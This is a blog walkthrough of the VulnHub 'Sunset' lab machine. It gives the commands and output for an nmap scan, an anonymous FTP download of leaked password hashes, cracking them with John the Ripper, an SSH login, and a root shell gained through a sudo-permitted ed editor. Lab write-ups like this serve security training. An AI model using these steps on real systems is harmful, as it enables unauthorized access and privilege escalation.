Tuesday, November 19, 2019

VulnHub: Sunset Walkthrough

We first start off with an nmap scan of the remote host. 

root@ubuntu:~/src# nmap -sC -sV -O -T5 192.168.56.104

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-19 11:47 MST
Nmap scan report for 192.168.56.104
Host is up (0.00046s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root         1062 Jul 29 00:00 backup
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.104:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey: 
|   2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
|   256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
|_  256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (EdDSA)
MAC Address: 08:00:27:13:81:5A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.27 seconds
root@ubuntu:~/src#

NMAP came back with two ports open 21 and 22. Lets connect to ftp and see what we can find there. 

root@ubuntu:~# ftp 192.168.56.104
Connected to 192.168.56.104.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.104:root): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r--   1 root     root         1062 Jul 29 00:00 backup
226 Transfer complete.
ftp>

We see there is one file that we can download called 'backup'. Lets download the file and see what is contains. After we downloaded the 'backup' file we cat its contents. 

root@ubuntu:~/src# cat backup
CREDENTIALS:                                                                                                                                                                                                       
office$6$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCravWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.                                                                                                                  
datacenter$6$3QWJ4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/                                                                                                              
sky$6$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0                                                                                                                     
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/   
root@ubuntu:~/src#

It looks like some user names and password hashes lets fire up john and start cracking 

root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/sunset-hash.txt --format=sha512crypt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
space            (space)
cheer14          (sunset)
2g 0:00:00:13 DONE (2019-11-19 11:58) 0.1484g/s 1064p/s 1862c/s 1862C/s gerber..chanda
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run#

We cracked two of the hashes we found our next step is to try and login to ssh with the following user names and passwords. 

root@ubuntu:~/src# ssh sunset@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ECDSA key fingerprint is SHA256:n9ATwmONo6fCyPblqlvcO7WcIWZJMqBaqDdo/jYnLPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.104' (ECDSA) to the list of known hosts.
sunset@192.168.56.104's password: 
Linux sunset 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 28 20:52:38 2019 from 192.168.1.182
sunset@sunset:~$

We got a successful login with 'sunset' using the password 'cheer14' lets now check sudo rights of the user. 

sunset@sunset:~$ sudo -l
Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
sunset@sunset:~$

We can run the ed editor with no password. We can ofcourse break out in to a shell with the ed program by specifying the commmand '! /bin/bash' inside the editor. 

sunset@sunset:~$ sudo /usr/bin/ed

! /bin/bash
root@sunset:/home/sunset# id
uid=0(root) gid=0(root) groups=0(root)
root@sunset:/home/sunset# whoami
root
root@sunset:/home/sunset#

We broke out in to a root shell now all thats left to do is cat the flag located in /root. 

root@sunset:/home/sunset# cd /root
root@sunset:~# ls
flag.txt  ftp  server.sh
root@sunset:~# cat flag.txt
25d7ce0ee3cbf71efbac61f85d0c14fe
root@sunset:~#
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • Attacking SMTP on Debian Linux
    First lets do a quick service scan against the remote host. root@asus:/mnt% nmap -sV -T4 -p22,25 mail.acme.com Starting Nmap 7.01 ( https:...
  • Attacking NFS
    This is our data set we will work from which was gathered during the OSINT phase from the company website: http://www.acme.com k.madden@m...
  • VulnHub: RickdiculouslyEasy Walkthrough
    Lets first start off with a nmap scan of the remote host. root@ubuntu:~# nmap -p0-65355 -sV -O -sC -T5 192.168.0.48 Starting Nmap 7.60 (...
  • Exploring IMAP Servers
    Scanning the Remote Host We can use NMAP to scan the remote IMAP server and run enumeration scripts agaisnt it to see what all the server i...